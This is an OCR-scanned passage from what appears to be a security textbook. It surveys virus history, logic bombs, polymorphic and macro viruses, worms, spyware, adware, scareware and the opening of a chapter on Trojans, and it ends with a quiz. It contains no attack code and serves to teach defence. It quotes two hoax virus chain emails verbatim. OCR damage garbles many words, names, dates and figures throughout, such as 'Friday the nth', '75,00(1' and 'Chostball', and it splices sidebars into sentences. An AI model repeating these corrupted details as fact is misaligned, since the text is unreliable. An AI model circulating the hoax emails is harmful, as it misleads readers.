known as a mobile application. In practice the Creeper virus, as it was known, spread from system to system by locating a new system while resident on another. When a new system was found the virus would copy 11 sell and delete itself oft’ tin- i>ld one. Additionally Liu- Creeper drus would print out a message on Lin in tee led machine that stated “Tin [he Creeper, catch me if you can/ In practice the virus was harmless and was not that advanced compared with modern examples. NOTE A second piece of code, known as the Reaper; was specifically designed to remove the Creeper from circulation. NOTE The term virus was not coined until the 1980s, so the negative term was not applied to these early examples. 238 PART 2 A Technical Overview of Hacking NOTE The ElkCloner virus was developed by Rich Skrenta when he was all of 15 years old. He developed the virus to have fun with friends who no longer trusted floppies that he gave them, He came up with the novel concept of infecting floppies with a memory-resident program. In the mid- 1970s a new feature was introduced in the Wabbit virus.. The Wabbit virus represented a change in t el c tics in that it demonstrated one of the features associated with modern day viruses — replication. The virus replicated on the same computer over and over again until the system was overrun and eventually crashed. In 1982 the first virus seen outside academia debuted in the form of the ElkC toner virus. This piece of ma [ware debuted another feature of later viruses — the ability to spread rapidly and re mil in in the computer’s memory to cause further infection. Once resident in memory, it w T ould infect floppy disks placed into the system Later, as many later viruses w T ould do. Four short years later, the first PC-compatible virus debuted. The viruses prior to this point were Apple II types or designed Tor specific research networks. In 1986 the first of what was known as boot sector viruses debuted , demonstrating a technique later seen on a much wider scale. This type of virus infected the boot sector of a drive and would spread its infection when the system was pjing through its boot process. The lirst of what would hiter be called logic bombs debuted in 1987: the Jerusalem virus. This virus was designed to cause damage only on a certain dale in ibis case. Friday the nth. The virus was so named because of its initial discovery in Jerusalem. Mullipartite viruses made their appearance in 1989 in the Chostball virus. This virus w T as designed to cause damage using multiple methods and components, all of which had to be neutralized and removed to clear out the virus effectively. Polymorphic viruses first appeared in 1992 as a way to evade early virus-detection techniques. Polymorphic viruses are designed to change their code and “‘shape” to avoid detection by virus scanners, which w r ould look for a specific virus code and not the new version. Fa st- forward to 2008 and Mocmex, Mo cm ex was shipped on digital photo frames manufactured in China. When the virus infected a system, its lirew r all and antivirus software were disabled; then the virus w T ould attempt to steal online-game passwords. Modern viruses and virus writers have gotten much more creative in their efforts and in some cases are financed by criminal organizations to build their software. NOTE The first logic bomb most individuals heard of was the Michelangelo virus, designed to infect on the famous painter’s birthday. In reality the virus was a great non-event — it was detected very early and eradicated before it could cause any serious damage. Types of Viruses So you can see that not all viruses are the same; there are several variations of viruses, each of which is dangerous in its own way. Understanding each type of virus can give you a better idea of how to tlrwart them and address the threats they pose, CHAPTER 10 Malware, Worms, and Viruses On October 29, 2003, a logic bomb was discovered at Fannie Mae, the Federal National Mortgage Association, in the United States. The bomb was created and installed by Rajendrasinh Makwana, an IT contractor who worked in Fannie Maes Urban a, Maryland, facility. As designed, the bomb was to activate on January 31 r 2009. If successful, it would have wiped all of Fannie Mae’s more than 4,000- servers. Makwana, upset that he had been terminated, planted the bomb before his network access was terminated. He was indicted in a Maryland court on January 27, 2009, for unauthorized computer access. Logic Bombs A logic bomb is a piece of code or software designed to lie in wait on a system nntil Ei specified event occurs. When the event occurs the bomb “goes off” and carries out its destructive behavior as the creator intended. While the options are literally endless as far as what a logic bomb can do, the common use of this type of device is to destroy data or systems. Logic bombs have been notoriously difficult to detect because of their very nature of being “harmless” until they activate. Mai ware of this type is simply dormant until whatever it is designed to look for happens. W hat can activate this software is known as a positive or negative trigger event coded in by the creator, A positive trigger is a mechanism that looks for an event to occur such as a date. A negative trigger, on the other hand, is designed to monitor an action; when such action does not occur it goes off. An example would be if a user does not log on for some period. This process of “hiding ” until an event occurs or does not occur makes this particular type of malware dangerous. As a security professional you will have to be extra vigilant to detect logic bombs before they do damage. Traditionally the two most likely ways to detect this type of device are by accident or after the fact. In the lirsl method, an IT worker just happens to stumble upon the device by sheer “dumb luck” and deactivates the bomb. In the second method, the device “detonates” and then the cleanup begins. The best detection and prevention methods are to be vigilant, to limit access of employees to only what is necessary, and to restrict access where possible. Polymorphic Viruses The polymorphic virus is unique because of its ability to change its “shape” to evade antivirus programs and therefore detection. In practice this type of malware possesses code that allows it to hide and mutate itself in random ways that prevent detection. This technique debuted in the late 1980s as a method to avoid the detection techniques of the time. 240 PART 2 A Technical Overview of Hacking Polymorphic viruses employ a series of techniques to change or mutate, these methods include: Polymorphic engines — Designed to alter or mutate the device’s design while keeping the pay load, the part that does the damage, intact Encryption — Used to scramble or hide the damaging payload. keeping antivirus engines from detecting it When in action, polymorphic viruses rewrite or change themselves upon every execution. The extent of the change is determined by the creator of the virus and can include simple rewrite to changes in encryption routines or alteration of code. Modern antivirus software is much better equipped to deal with the problems polymorphic viruses pose. Techniques to detect these types of viruses include decryption of the virus and statistical analysis and heuristics designed to reveal the software’s behavior. Multipartite Viruses The term multipartite refers to a virus that infects using multiple attack vectors, including the boot sector and executable files on the hard drive. What makes these types of viruses dangerous and powerful weapons is that to stop them h you must totally remove all their parts. If any part of the virus is not eradicated from the infected system, it can re-infect the system. Multipartite viruses represent a problem because they can reside in different locations and carry out different activities. This class of virus has two parts, a boot in fee tor and a file infeetor. If the boot in fee tor Is removed the file in fee tor will re -infect the computer. Conversely, if the file infeetor is removed the boot sector will re-infect the computer. Macro viruses are a class of virus that infects and operates through the use of a macro language. A macro language is a programming language built into applications such as Microsoft Office in the form of Visual Basic for Applications I’VBA), It is designed to automate repetitive tasks. Macro viruses have been very effective because users have lacked the protection or knowledge to counteract them. Macro viruses can be implemented in different ways, usually by being embedded into a file or spread via e-mail. The initial infections spread quite quickly because earlier applicEitions would run the macro when a file was opened or when an e-mail was viewed. Since the debut of these viruses, most modern applications disable the macro feature or Eisk users whether they want to run macros. Macro Viruses MOTE After the initial outbreaks of macro viruses, Microsoft introduced the ability to disable macros. In Office 2010 macros are disabled by default. CHAPTER 10 Malware, Worms, and Viruses Hoaxes A hoax is not a true virus. But no discussion of viruses is complete without mentioning the hoax virus. Hoax viruses are those designed to make the user take action even though no infect ion or threat exists. The following example is an e-mail that actually is a hoax H virus, PLEASE FORWARD THIS WARNING AMONG I RlliNDS, FAMILY AND CONTACTS: You should be alert during the next days: Do not open any message with an attached iiled called “Invitation” regardless of who sent it. It is a virus that opens an Olympic Torch which “burns” the whole hard disc C of your computer. This virus will be received from someone who has your e-mail address in his/her contact list. That is why you should send this e-mail to all your contacts. It is belter to receive this message 2 5 times than to receive the virus and open it. If you receive a mail called “Invitation,” though sent by a friend, do not open it and shut down your computer immediately. This is the worst virus announced by CNN; it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. SEND THIS E-MAIL TO EVERYONE YOU KNOW, COPY THIS E-MAIL AND SEND IT TO YOUR FRIENDS AND REMEMBER: IF YOIJ SEND IT TO THEM, YOU WILL BENEFIT ALL OF OS. 1 1 ere ‘s a n ot h er e jc a m pie: AIL There’s a new virus which was found recently which will erase the whole C drive. If you get a mail with the subject “Economic Slow Down in US” please delete that mail right away. Otherwise it will erase the whole C drive. As soon as you open it. it says< 11 Your system will restart now … Do you want to continue?”. Even if you click on NO. your system will be shut down and will never boot again. It already caused major damage in the US and few other parts of the world. The remedy for this has not yet been discovered. Please make sure you have backed up any local hard drive files adequately — network, floppy, etc. In both cases a simple search of Google or discussion with the IT department of a company wilt reveal these to be hoaxes: however, in many cases the recipients of these nu-ssnges panic and forward them on. causing furl Jut panic. Prevention Techniques Viruses have been in the computer and network business almost as long as the business itself has been around. A wide variety of techniques and tools have evolved to deal with the threat. 242 PART 2 A Technical Overview of Hacking Education Knowledge is half the battle. Getting system owners to understand how not to get infected or spread viruses is a huge element in stopping the problem. Users should be instructed on proper procedures to stop the spread of virus code. Such tips should generally include: • Don’t allow employees to bring media from home • Instruct users not to download files except from known and trusted sources • Don’t allow workers to install software without permission from the company IT department ■ Inform IT or security of strange system behaviors or virus notifications • Ban flash drives • Ban portable hard drives Limit the use of administrative accounts Antivirus The next line of defense is the antivirus software that is designed to stop the spread and activity of viruses. Antiviruses are designed to run in the background on a system, staying vigilant for activity that suggests viruses and slopping or shutting it down. Antiviruses are effective tools, but they can be so only if they are kept up to date. Antiviruses rely on a database of signatures that lets them know what to look for and remove. Because new viruses are released each day, if you neglect this database it becomes much more likely a virus will get through. Because there is a wide range of viruses and other malicious code, an antivirus must be able to detect more than a simple virus. Good antivirus software can detect viruses, worms, Trojans, phishing attacks, and, in some cases h spy ware. Antiviruses tend to use one of two different methods. The first is the suspicious behavior method. Antivirus programs use this to monitor the behavior of applications on a system. This approach is widely used as it can detect suspicious behavior in existing programs, as well as detecting suspicious behavior that indicates a new virus may be attempting to infect your system. The second method is dictionary-based detection. This method will scan applications and other files when I hey have Etc cess to your system, This advantage of this method is that it can detect a virus almost immediately instead of letting it run and detecting the behavior later, The downside is that the method can detect only viruses that it knows about — if you neglect to update the software it cannot detect new viruses. CHAPTER 10 Malware, Worms, and Viruses 243 Applying Updates Another detail that you cannot overlook is applying patches on systems and softwEire when they become available. Vendors of operating systems and applications such ns Microsoft regularly release patches designed to close holes End address vulnerabilities on systems that viruses could exploit. Missing a patch or update can easily mean the difference between avoiding a problem and having your system crippled. Worms and How They Function NOTE Microsoft is one of many software vendors that have made a point of regularly addressing security issues via patches. In Microsoft’s case a monthly event known as Patch Tuesday is specifically geared toward addressing security issues, ^NOTE Worms can cause alterations to or corruption of data on a system t but can also cause damage indirectly by replicating at a rapid rate, clogging networks with traffic they cannot handle. Worms are a different type of malware a I to gel her. Viruses require user intervention for their infection to take place — such as the opening of a file or the booting of a computer In the case of worms, however, no user action is required, A worm is a self-replicating piece of software thai combines the convenience of computer networks wilh ihe power of malware. Worms also differ from viruses in that viruses require a host program to stay resident, A worm does not require this and is actually self-contained. Worms also can cause substantially more harm than a virus K which is typically limited to corrupting data and applications. An earlier chapter mentioned the earliest recognized worm, known now as the Morris worm. This worm exhibited some of the traits associated with modern-day worms, particularly the ability to rapidly replicate. At the time the Morris worm was unleashed, the Internet was small compared with today, but the effect was no less devastating. The worm replicated so rapidly and so aggres- sively thai networks were clogged with traffic and brought down. Estimates a I the time placed the damage from the outbreak at$ 10 million (not adjusted for inflation).

One worm that caused widespread damage was the SQL
Slammer or Slammer worm. The Slammer worm was responsible
for widespread slowdowns and denials of service on the Internet,
It was designed to exploit a known buffer overflow in Microsoft’s
SQL Server and SQL Server Desktop Engine products, liven though
Microsoft had released a software patch six months hefore the actual infection, many
had neglected to install the patch, and therefore the vulnerability still existed on many
systems. As a result, in the early morning hours of January 25, 2003 , the worm became
active and in Jess than 10 minutes had infected 75,00(1 machines.

MOTE

The fallout from the Morris
worm is still debated today,
with damage estimates ranging
up to 100 million and several thousand computers or more infected. While the numbers can be argued, what cannot be is the impact of the infection. People realized that worms posed a threat and that tougher laws on cybercrime were needed. 244 PART 2 A Technical Overview of Hacking How Worms Work Worms are relatively simple in design and function, but very dangerous due to the speed and effectiveness with which they spread. Most worms share certain characteristics, which help define how they work and what they can do. The characteristics are as follows: • Do not need a host program to function • Do not require user intervention • Replicate rapidly • Consume bandwidth and resources • Worms can also perform some other functions, including: • Transmit information from a victim system • Carry a payload such as a virus • Examining these characteristics a bit more in detail will help you understand how a worm w r orks and the challenges worms pose to a security professional. In fact, worms differ from viruses in two key ways: » A worm can be considered a special type of malware that can replicate and consume memory, but not attach to other programs. • A worm spreads through infected networks automatically, while a virus does not. One of the main characteristics of worms Is that they do not need a host program to function, unlike their fellow malware viruses. Worms are designed to function by leveraging vulnerabilities on a target system that is generally unknown or unpatched. Once a worm locates one of these vulnerabilities, it infects the system and then uses the system to spread and infect other systems. A worm performs alt these functions by using the system’s own processes to do its job, but does not require any host program to run before starting the initial process. Another characteristic that differentiates worms from other malware is their ability to run without user intervention. Viruses, for example, require a host program to be executed for the infection to begin: worms simply need the vulnerability to exist in order for the process to take place. In the case of worms, just having a system turned on and NOTE connected to the Internet is enough to make it a target. Combine this with the vulnerabilities and the danger is obvious. The Slammer worm doubled the number of infected machines every 3,5 second much faster than previous worms. Slammer boasted an infection rate that was 250 trmes as fast as Code Red, which had come only two years earlier. Since Day 1, worms have possessed a feature that makes them a dangerous force to deal with — their ability to replicate very rapidly. One of the features of the Morris worm that even its creator did not expect was that it replicated so rapidly that it choked up networks and shut them down quite effectively. This feature has been a characteristic of worms ever since. Worms can replicate so quickly that their creators are frequently caught off guard. This replication is made possible by a number of factors, including J poorly maintained systems, networked systems, and the number of systems linked via the Internet, CHAPTER 10 Malware, Worms, and Viruses 245 Light Side Versus Dark Side Some worms have been created for benign purposes. One such family of worms is the Nachi family. Nachi was designed to locate systems that had certain vulnerabilities not patched by the system owner. It wo uld then download the appropriate patches to fix the problem. Such worms introduced several questions. Among them was, if a worm has benign purposes in mind, is it OK? This question has compelling arguments on both sides. NOTE One of the earliest warning signs of worms is the unexplained slowdown of a system even after repeated reboots or other checks. While not always a sign of a worm, it is one of the red flags that the system owner should investigate. Probably the most visible or dramatic feature of worms is their consumption of resources, which shows up eis a side effect. Mix into this equation of speed and replication the number of computers on the In tern el, and you have a situation that teads to bandwidth resources being consumed on a huge scale. Worms such as Slammer caused massive slowdowns on the Internet due to the scans it sent out looking for vulnerable systems and the way it moved its pay load around. Additionally, the worm consumed resources on infected systems as it replicated off the system, using system resources to do so. In recent years some new characteristics have been added to the behaviors of worms, one of which is the ability to carry a pay load. While traditionally? worms have not directly damaged systems, worms thai carry pay loads can do all sorts of mischief, One of the more creative uses of worms has been to perform “crypto viral extortion. H The worm drops off a pay load that looks for specific file types (such as .doc files) and encrypts them. Once this has taken place* the worm leaves a message for the user offering to reveal the encryption key after the user pays a certain amount of money. Stopping Worms At the core of the worm problem is operating systems that have overlooked or un patched vulnerabilities. Vendors such as Microsoft have made concerted efforts to release patches regularly to address issues in their operating systems — including vulnerabilities that worms could use to spread. The problem becomes one of knowing patches are available for a system and applying them. This problem becomes even bigger when you realize that worms aren’t restricted just to corporate systems — they can also hit home users, who are more likely to miss ptitches, In some cases, patches are not yet released for a vulnerability. This leads to what is called a zero- day exploit, in which a hole can be exploited immediately. P NOTE Several worms such as Code Red, Nimda r Blaster, and Slammer are still alive and well on the Internet today, although at levels well below their initial outbreak. These worms, some of which are nine years old, still infect systems. The main reason? System owners that have neglected to patch their systems, either out of ignorance or laziness. 246 PART 2 A Technical Overview of Hacking NOTE The old saying “An ounce of prevention is worth a pound of cure” applies to virus and worm prevention, as it is vastly easier to stop the problem before ft starts than to try to remedy it after the fact. The Power of Education Much as with viruses, education is key to stopping worms. Worms are frequently spread via e-mail applications by e-mails bearing the name ILOVEYOU, for example. These prey on a user’s curiosity — the user opens the e-mail and unknowingly runs the worm in the background, Add in attacks such as phishing> which further pique a user’s curiosity, and you have a problem that only education can address. Antivirus and Firewalls One of the primary lines of defense against worms is reputable antivirus and anti-spy ware applications, [laving an antivirus EipplkTillon on ;i system helps prevent u worm in lection hut only if it is kept up to date. Modern and up-to-date antivirus applications can easily stop most worms when they appear. Another way to stop worms is the tire wall. The firewall is a valuable tool as it can block the scans to and from a system that worms use both to spread the infection and to deliver it from an infected system to other systems. Most modern operating systems such as Microsoft’s Windows 7 include this feature as part of the core system. Spy ware Spy ware is software designed to collect and report information on a user’s activities without the user’s knowledge or consent. Spy ware can collect any type of information about the user that the author wishes to gather, such as: • Browsing habits • Keystrokes • • Software usage • General computer usage Spy ware has been used to gather information for any reason that its author deems useful. The information collected has been used to target ads. generate revenue for the author, steal personal in formation, or steal data from an infected system. In some cases, spy ware has gone beyond simple information collection to altering a system’s behavior to be more along the lines of the author’s wishes. Additionally, spy ware has been known to act as a precursor to further attacks or infection. It can be used to download and install software designed to perform other tasks, CHAPTER 10 Malware, Worms, and Viruses 247 Methods of Infection Spy wei re can be placed on a system by a number of different methods, each of which is effective in its own way When the software is installed, it typically remains hidden and proceeds to carry out its task. Delivery methods for spy ware include; Peer-to- peer networks (P2P) — This delivery mechanism has become very popular because of the increased number of individuals using these networks to obtain free software. Instant messaging (INI} — Delivering malicious software via IM is easy and because IM software has never had much in the way of security controls. Internet Relay Chat (IRC) — IRC is a commonly used mechanism to deliver messages and software because of its widespread use and the ability to entice new users to download software. • E-mail attachments — With the rise of e-mail as a communication medium, the practice of using it to distribute malware has also risen. Physical access — Once an attacker gains physical access, it becomes relatively easy to install the spy ware and compromise the system. • Browser defects — With many users forgetting or not choosing to update their browsers as soon as updates are released, distribution of spy ware becomes easier. ■ Freeware — Downloading software free from unknown or un trusted sources can mean that you may have downloaded something nastier, such as spy ware. One of the more common ways to install software on ei system is through Web browsing. When a user visits a given Web site, the spyw T are is downloaded and installed using scripting or some other means. Spy ware installed in this manner is quite common as Web browsers lend themselves to this process — they are frequently imp ate bed. do not have upgrades Eip plied, or are incorrectly configured. In most cases users do not use the most basic security precautions that come with a browser, in some cases overriding them to get \ better browsing experience or to see fewer popup s or prompts. ^ NOTE In some articles and publications, this installation method is referred to as drive-by downloads, In Windows Vista one of the much-maligned features was known as the UAC or User Account Control. One thing this feature was designed to prevent is software installing or other activity happening without a user’s knowledge. Because some users hated the change in behavior between Vista and Windows XP, they shut off this feature to stop the nag screen. But this also disabled protection in Internet Explorer designed to offer more security including against spyware. 248 PART 2 A Technical Overview of Hacking FIGURE 10 1 Installation options. J Cttearter v232 Setup ferial Optf P Add Desktop Shoe font [7; Add Menu SKrtCute V Arid ‘Rm-i CCfeaner ‘ optica to Rttyde Sn ncjrtte** [A Add ‘Open GOearier . . , ‘ option to Recycle Br. context menu [Vj Automalicaly dhedc for updates bo CCfeaner [Ths nay not work if you have a firewat nstalled) I ^ Add COeaner vahpo? Toolbar ane* uk COeaner froen /our browser WWw.ptriform.i^Ofti ■tf flack total Can cet Bundling with Software Another common way to place software on a user’s system is via installation of other software that the user intentionally installs. In these cases, a user downloads a legitimate piece of so ft w tire from a Web site and then proceeds to install it During the In stall tit ion process the user is prompted to Install additional software before proceeding. In most cases u^lts believe that they can’t install Lhe so flu tire Lhey vvanl v,ilhuu1 accepting it. Or they simply click the ” L Kext N button and don’ I pay attention. Other ways to get spy ware on a system during installation are strategically placed checkboxes that install spy ware-type Explications by default. Such a dialog is shown in Figure 10-1 . Adware You will frequently find adware in the same machines infected with spy ware. Adware is software specifically designed to display ads your system in the form of popups or nag screens. When this class of software is deployed with spy ware, the effect can be quite dramatic, as you will be bombarded with ads specifically targeted to you and your search habits. In a number of situations, adware is installed on victims 1 systems because it + s been bundled with software that they wish to install. In these situations, when adware is installed it can monitor the usage of the software it was installed with or it can monitor a wide range of other activities. When a piece of adware is installed on a system, the goals can be very different from those of spy ware or other types of malware. In the early days CHAPTER 10 Malware, Worms, and Viruses 249 FYl _J”l It is not unheard of for versions of software in which developers have embedded adware to be re- released by the pirate software community without the adware in place. One such example is the file sharing software Kazaa. Kazaa had a version that included spyware/adware in it as part of the normal free installation. However, this software was cracked and released without the adware in place. Of course, this raises the question: What did the pirates include? of adware, it was not uncommon for adware to be installed because developers wanted to make more money from their software than they otherwise could. When such software is installed, you will typically not notice until you are presented with ads or other types of prompts. In other cases h adware as not hidden from the user; it is much more obvious. Some developers will offer different versions of ihvlr soliw cm-, (nn- with ads mul one without. I ‘sers wishing to get the software free must tolerate the annoyance of ads. Users wishing to avoid ads must pay for the privilege. Scareware NOTE It is common for developers of so-called freeware to include adware as part of their product. In fact, some well-known software such as Google Earth bundles other software with it, such as browsers or other products. Most manufacturers of this type of software justify their actions as a way to provide the software free or at low cost. Scareware is a type of ma I ware designed to trick victims into purchasing and downloading useless and potentially dangerous software. Scareware generates authentic looking popups and other ads on a system to make users think something bad has happened or will happen. For example, a common tactic is to display a popup on-screen that appears to initiate a virus scan. It inevitably locates a “virus” and then presents you with an offer to purchase software that removes it. In most cases this software is worthless or actually installs something else that performs other nasty actions, such as those connected to spyware. Users who fall for this scam typically tlnd themselves at ibe very least out some amount of money — not to mention that whatever they installed may have damaged their system. What makes this software even worse is that it frequently employs techniques that outright frighten system users. In addition to generating large numbers of bogus error messages, this class of malwarc may also generate real-looking dialogs such as those seen in Windows, When you click on these “ujj i h 1 1 j elcse i hem . liu-;. may actually be installing the software, NOTE This type of software has become more common over the last few years as users have become more savvy, and malware authors have had to change their tactics. Enticing users to click on realistic dialogs and presenting real- looking error messages can be powerful ways to place illicit software on a user’s system. 250 PART 2 A Technical Overview of Hacking When executed, some scare ware will go one step further, even weakening existing system security. Sea re ware has been known to install on a system and specifically hunt down and disable protective software such as firewalls and antiviruses. Even worse, some of this software will even prevent updates from the system vendor, meaning that security holes and defects may no longer be fixed, Removing scareware can be a daunting task, because it disables legitimate software that protects the system. In some cases, the system may be so compromised that all Internet activity and other update systems may error out, preventing you from making any changes. Current tactics have evolved even further to include extortion. Recent tactics have included installing software on a system that hunts for certain file types (i.e.. Word documents) that it encrypts. It then offers to decrypt them only if the user pays up. _f v . fljft CHAPTER SUMMARY Ma I ware has in creased in power and aggressiveness over the past few years to the point where a security professional cannot overlook or ignore the threat. Malware lias taken many forms and has moved from being a simpJe annoyance to being criminal mischief. Software in this category has evolved dramatically to the point of being extremely malicious. MaJware can now steal passwords, personal information, and plenty of other information from an unsuspecting user. The modern concept of malware lirst came into being in the l L )80s and 1990s. Terms such as viruses, worms, adware, scareware, and spy ware have become more common in popular usage. In the past, malware was just annoying. But is has become easier to spread because of [he convenient distribution channel the Internet offers, as w r ell as the increasingly clever social engineering methods the creators of this type of software employ. Making the problem of malware even worse is the complexity of modern software, frequent lack of security, known vulnerabilities, and the lax altitude many users have toward applying security updates and patches. New types of malware have included increasingly common scareware. Software in this category is designed to scare you into installing the package. When you do, it takes over the system and disables protective mechanisms or other items. CHAPTER 10 Malware, Worms, and Viruses KEY CONCEPTS AND TERMS Ad ware Malware Boot se cto r Sea re wa re End user license agreement IrVorrni (EULA) CHAPTER 10 ASSESSMENT 1. Viruses do not require a host program. A, True B, False Z. Worms, are designed to replicate repeatedly. A. True B. False 1. is designed to intimidate users. A. Ad ware B, Viruses C Scareware D, Worms 1. Which is used to intercept user information/ A, Ad ware B, Scareware C Spy ware D, Viruses 1. Is known to disable protective mechanisms on a system such as antiviruses, antlspyware, and firewalls, and to report on a user’s activities. A. Ad ware B. Scareware C Spyware D, A virus 1. Which of the following is a characteristic of ad ware? A, Gathering information B, Displaying popups C intimidating users II Replicating 251 1. Prevention of viruses and malware Includes A. Popup blockers B. Antivirus C. Buffer overflows LX All of the almve 1. is a powerful preventative measure to stopping viruses, 1. Which of the following can limit the impact of worms? A. Antiviruses, firewalls, patches B. Anti-spy ware, firewalls, patches C. And- worm ware, firewalls, patches 11 Anti-malware 1. attaeh(es) to files. A. Viruses B. Worms C. Ad ware Jl Spywarc 1 1 . Multipartite viruses come In encrypted form. A. True B. False 1 2. rceord{s) a user’s typing. A. Spy ware B. Virsues C. Ad ware D. Malware U. are configured to go off at a certain date, time, or when a specific event occurs. 1. Scareware Is harmless. A. True li. False Trojans and Backdoors ONE OF THE OLDEST and most commonly misunderstood forms of malware is the Trojan horse or Trojan. Trojans are pieces of software that are designed to give an attacker covert access to a victim’s system. A Trojan is designed to be slipped onto a system quickly and stealthily to start whatever action it is meant to perform. Trojans are small and compact. This makes them one of the hardest types of software to detect on a system. Trojan horses have a long history in the field of computer security. Since they first came into existence, they have represented one of the chief threats and dangers to users, as they can appear very attractive, enticing them to click on and install software that grants someone else full control of their systems. Such programs operate effectively once they have been installed, as they use existing communication methods such as ports to transfer their information between systems using overt channels to carry information in covert channels. A Trojan can be defined as a program that carries something of hidden intent. Because of their ability to hide from detection, Trojans represent one of the leading threats to their targets 1 systems. Trojans have been hidden in a diverse group of software packages, including games, chat software, e-mail, Flash movies, and other types of software. When a program is said to be “Trojaned,” it has been infected or embedded with some function that is malicious in purpose, When a Trojan is planted on a system successfully, the intent is usually to open what is known as a backdoor Backdoors are openings on a system that an attacker makes to bypass normal security measures on a system. With one of these openings in place, attackers can gain undetected, unchecked access to a system for any purpose they intend, which is typically some sort of remote access. This lets attackers steal information, control a system remotely, upload files, and even use one system to attack another system. Included in the discussion of Trojans and backdoors are what are known as covert and overt channels. These two channels represent a mechanism for transferring information between systems and processes in ways that are supported and unsupported, Overt channels represent the path that data and other information are supposed to travel over by design. As such, the paths can be properly monitored and controlled, Covert channels are said to be in effect whenever data and other information are transferred over mechanisms not specifically designed to carry the information in question. Covert channels represent a free ride for attackers, as their activities over these paths may go completely undetected. In this chapter we will discuss the various mechanisms that an attacker can use to gain control of, maintain control of, and transfer information to and from a victim system. f Chapter 11 Topics This chapter covers the following topics and concepts: • What the significance of Trojans is What detection of Trojans and viruses is What tools for Trojans are What distribution methods are What Trojan construction kits are • What backdoors are • What covert communication is • What software protection is • Chapter 11 Goals When you complete this chapter, you will be able to: • List common behaviors of Trojans • List the goals of Trojans • List the ways of detecting Trojans • List the tools for creating Trojans • Explain the significance of covert channels ■ List the tools for removing Trojans • List the types of Trojans • List software protection mechanisms for Trojans • Explain the purposes of backdoors • 254 PA RT 2 A Tech n i ea I Overview of H atk i n g Significance of Trojans Trojans are one of the oldest mechanisms used to compromise a computer system and are still one of the more effective methods of doing so. When planned and implemented correctly, a Trojan can yrani access to a system on behalf of the attacker, allowing all sorts of activities to take place. Software in the Trojan category represents oneofthe biggest dangers to the end user or owner of a system. Users can be easily coerced into installing or running software that looks legitimate but hides a pEiyload that does something unwanted, such as opening up avenues that an attacker can use. Further complicating things is the fact that Trojans operate on a principle that can be summed upas “permitting what you cannot deny”; in other words, using ports and mechanisms on the system that you have to leave open for the system to function normally such as ports 80 and 21 . These programs can even redirect traffic in w T ays that they use ports that are open in place of ones that the attacker does not wish to use. The list of pieces of software that can be Trojaned is endless. It includes anything that the creator believes will entice the victim to open the software. Applications such as games, chat software, media players, screen savers, and other similar types have been Trojaned. For example, an attacker may choose a popular downloadable game as a distribution method by downloading it h infecting it. and posting it on a discussion group, By choosing a popular piece of software thai people will willingly download, the attacker increases the chances of higher infection rates. An Unknowing Victim? The following is an excerpt of a story that was originally published on zdnet.co.uk. “Julian Green r 45, was taken into custody last October after police with a search warrant raided his house. He then spent a night in a police cell r nine days in Exeter prison and three months in a bail hostel. During this time, his ex- wife won custody of his seven-year-old daughter and possession of his house. This is thought to be the second case in the UK where a J ‘ Trojan defense” has been used to clear someone of such an accusation, tn April, a man from Reading was found not guilty of the crime after experts testified that a Trojan could have been responsible for the presence of 14 child porn images on his PC. Trojan horses can be used to install a backdoor on a PC, allowing an attacker to freely access the computer. Using the backdoor, a malicious user can send pictures or other files to the victim’s computer or use the infected machine to access illegal Web sites, while hiding the intruder’s identity. Infected machines can be used for storing files without the knowledge of the computer’s owner.” CHAPTER 11 Trojans and Backdoors Trojans get their name “from the large wooden horse of Greek mythology that appeared at the gates of the city of Troy. Thinking it was a gift, the Trojans brought the horse into the city But it only looked like a gift. Little did the T r ojans know that inside the horse was hidden a small detail of warriors who emerged at night and started the battle that destroyed the city. This story explains the same concept that gave the Trojan form of malware its name. A hacker may hai r e several goals in mind when creating ei Trojan, but typically it is to maintain access for later usage. For example, an attacker may compromise a system and install a Trojan that will leave a backdoor on the system. Types of Trojans include: • Remote access — Remote access Trojans (RAT) are designed to give an attacker control over a victim’s system. Two well-known members of this class are the SubS even program and its cousin Back Orifice. Typically members of this class work in two components: a clien t and a server. • Data sending — Trojans of this type are designed to capture and redirect data to an attacker. The types of data these Trojans can capture are varied but can include anything from keystrokes and passwords to any other type of information that may be generated or reside on the system. This information can be redirected to a hidden file or even e-mail if there is a predefined e-mail account. • Destructive — Software in this category is designed to do one thing and one iJimy only: destroy data and kill a system. Denial of service (DoS) — Software in this category is designed to target a specific service or system, overwhelm it and shut il down. • Proxy — Trojans that lit into this category allow attackers to use a victim’s system to perform their own activities. Using a victim’s system to carry out a crime makes Locating the actual perpetrator much more difficult. • FTP — Software in this category is designed to set up the infected system as an FTP server. An infected system will become a server hosting all sorts of data including illegal software, pirated movies and music or, as has been observed in some cases, pornography. • Security software d isablers — Trojans of this type are designed to specifically target the security countermeasures present on a system and shut them down. On a system infected with this software, mechanisms such as antivirus, firewall, and system updates are often disabled. Trojans often use this strategy first to infect a system and then perform activities from one of the other categories, such as setting up a proxy server or FTP site. 256 PART 2 A Technical Overview of Hacking One Use of a Trojan The following story appeared in 2002 and shows how a Trojan can be used, in this case by law enforcement, for legitimate reasons,. “Feds Out- Hack Russian Hackers” With the help of some new computer spying software, FBI agents were able to out-hack a pair of Russian hackers who had stolen thousands of credit card numbers to make purchases on Ebay and then defraud Pay Pal, the leading online bill payer. The challenge, said Assistant U.S. Attorney Floyd Short, was that the suspects, Alexei Ivanov and Vasily Gorshkov, were Russians. And their server — where Short says they kept thousands of stolen credit card numbers — was also in Russia. The game — which was successful — was for authorities in Seattle, Wash., to steal the passwords and codes to the Russians’ server in Russia. “Gorshkov went on the Internet,” said Floyd. “We obtained the name of the server in Russia, his user name and his password…. It was critical to the case.” How exactly did the FBI record an encrypted password and codes? It was with a100
piece of software invented by Richard Eaton of Ken ne wick, Wash.

Eaton’s program, WinWhat Where Investigator, has revolutionized computer snooping
with what’s called keystroke logging. The software secretly records everything a user types,
coded or not, and sends a report to a third party who is spying on the user.

“The Russians just sat down and entered their passwords. It couldn’t have been any better
than that,” said Eaton.. .

Computer Trojans emerged in the mid-1980s as a way to infect software and distribute
the infected pay load to different systems without raising suspicion, in most situations, but
not all, Trojans are intended to ailow an attacker to remotely access or control a victim’s
system. In the event an application that is infected with a Trojan is installed on a target
system, the attacker can not only obtain remote access, but also perform other operations
designed to gain control of the infected system. In fact the operations that an attacker can
perform are limited by only two factors: the privileges of the user account it is running
under and the design the author has chosen to implement. By infecting a system with a
Trojan, an attacker opens up a backdoor to the system that he or she can take advantage of.

Methods to Get Trojans onto a System

Hackers have a range of options, from high-tech to low. for getting Trojans onto their
